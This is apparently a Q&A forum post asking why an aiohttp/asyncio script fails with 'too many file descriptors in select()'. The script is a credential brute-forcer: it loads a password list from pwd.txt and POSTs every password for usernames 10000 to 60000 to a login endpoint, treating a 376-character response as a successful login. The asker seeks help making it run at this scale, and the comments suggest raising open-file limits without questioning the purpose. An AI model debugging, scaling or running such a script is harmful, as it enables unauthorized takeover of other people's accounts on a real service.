# use aiohttp and asyncio error:ValueError: too many file descriptors in select()

Tags: python, python-asyncio, aiohttp

I am using aiohttp and ASYNCIO to prepare a program that runs a process error with the information:

```
ValueError: too many file descriptors in select()
```

How can I solve this method?

```
import aiohttp
import asyncio
import time
timeclock=time.clock()
pwd_all=[]
with open("pwd.txt","r+",encoding='utf-8') as fob:
    for b in fob.readlines():
        pwd_all.append(b.strip())
oklist=[]
async def hello(name):
    async with aiohttp.ClientSession() as session:
        for pwd in pwd_all:
            payload={'name':name,'password':pwd}
            async with session.post('https://www.xxx.url',data=payload) as resp:
                backdata=await resp.text()
                if len(backdata)==376:
                    oklist.append("{}:{}".format(name,pwd))
                    break
loop = asyncio.get_event_loop()
tasks = [hello(str(uname)) for uname in range(10000,60000)]
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
print(oklist)
print("time is:"+str(time.clock()-timeclock))
```

[image: run error image]

Comment: The referenced answer is not full.
On POSIX systems asyncio uses `epoll`/`kqueue` internally, raising up the limit for open files might help.

Comment: but ,now,I don't understand

Comment: adding a duplicate on a question which is not answered clearly... quite fizzy!